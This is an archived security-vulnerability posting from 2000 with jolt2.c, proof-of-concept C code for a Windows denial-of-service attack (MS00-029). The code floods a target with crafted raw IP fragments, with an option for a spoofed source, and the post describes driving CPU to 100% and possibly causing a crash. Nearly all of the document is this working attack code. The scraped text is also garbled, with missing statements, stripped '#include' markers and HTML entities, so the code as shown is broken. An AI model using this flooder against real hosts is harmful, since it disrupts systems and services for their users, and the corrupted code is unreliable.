Windows DoS code (jolt2.c) (fwd)

Type securityvulns
Reporter Securityvulns
Modified 2000-05-26T00:00:00


This is code for the new DoS discovered by Razor a few days ago. It forces cpu utilization to 100%, making everything move really really slow. Tested against Win98, WinNT4/sp5,6, Win2K.

An interesting side note is that minor changes to this packet cause NT4/Win2k (maybe others, not tested) memory use to jump substantially (+70 meg non-paged-pool on a machine with 196 mb phys). There seems to be a hard upper limit, but on machines with smaller amounts of memory or smaller swapfiles, ramping up the non-paged-pool this much might lead to a BSOD.


/ * File: jolt2.c * Author: Phonix <> * Date: 23-May-00 * * Description: This is the proof-of-concept code for the * Windows denial-of-serice attack described by * the Razor team (NTBugtraq, 19-May-00) * (MS00-029). This code causes cpu utilization * to go to 100%. * * Tested against: Win98; NT4/SP5,6; Win2K * * Written for: My Linux box. YMMV. Deal with it. * * Thanks: This is standard code. Ripped from lots of places. * Insert your name here if you think you wrote some of * it. It's a trivial exploit, so I won't take credit * for anything except putting this file together. /

include <stdio.h>

include <string.h>

include <netdb.h>

include <sys/socket.h>

include <sys/types.h>

include <netinet/in.h>

include <netinet/ip.h>

include <netinet/ip_icmp.h>

include <netinet/udp.h>

include <arpa/inet.h>

include <getopt.h>

struct _pkt { struct iphdr ip; union { struct icmphdr icmp; struct udphdr udp; } proto; char data; } pkt;

int icmplen = sizeof(struct icmphdr), udplen = sizeof(struct udphdr), iplen = sizeof(struct iphdr), spf_sck;

void usage(char *pname) { fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname); fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n"); exit(0); }

u_long host_to_ip(char host_name) { static u_long ip_bytes; struct hostent res;

res = gethostbyname(host_name); if (res == NULL) return (0); memcpy(&ip_bytes, res->h_addr, res->h_length); return (ip_bytes); }

void quit(char *reason) { perror(reason); close(spf_sck); exit(-1); }

int do_frags (int sck, u_long src_addr, u_long dst_addr, int port) { int bs, psize; unsigned long x; struct sockaddr_in to;

to.sin_family = AF_INET; to.sin_port = 1235; to.sin_addr.s_addr = dst_addr;

if (port) psize = iplen + udplen + 1; else psize = iplen + icmplen + 1; memset(&pkt, 0, psize);

pkt.ip.version = 4; pkt.ip.ihl = 5; pkt.ip.tot_len = htons(iplen + icmplen) + 40; = htons(0x455); pkt.ip.ttl = 255; pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP); pkt.ip.saddr = src_addr; pkt.ip.daddr = dst_addr; pkt.ip.frag_off = htons (8190);

if (port) { pkt.proto.udp.source = htons(port|1235); pkt.proto.udp.dest = htons(port); pkt.proto.udp.len = htons(9); = 'a'; } else { pkt.proto.icmp.type = ICMP_ECHO; pkt.proto.icmp.code = 0; pkt.proto.icmp.checksum = 0; }

while (1) { bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr)); } return bs; }

int main(int argc, char *argv[]) { u_long src_addr, dst_addr; int i, bs=1, port=0; char hostname[32];

if (argc < 2) usage (argv[0]);

gethostname (hostname, 32); src_addr = host_to_ip(hostname);

while ((i = getopt (argc, argv, "s:p:h")) != EOF) { switch (i) { case 's': dst_addr = host_to_ip(optarg); if (!dst_addr) quit("Bad source address given."); break;

  case &#39;p&#39;:
    port = atoi&#40;optarg&#41;;
    if &#40;&#40;port &lt;=0&#41; || &#40;port &gt; 65535&#41;&#41;
      quit &#40;&quot;Invalid port number given.&quot;&#41;;

  case &#39;h&#39;:
    usage &#40;argv[0]&#41;;


dst_addr = host_to_ip(argv[argc-1]); if (!dst_addr) quit("Bad destination address given.");

spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!spf_sck) quit("socket()"); if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs, sizeof(bs)) < 0) quit("IP_HDRINCL");

do_frags (spf_sck, src_addr, dst_addr, port); }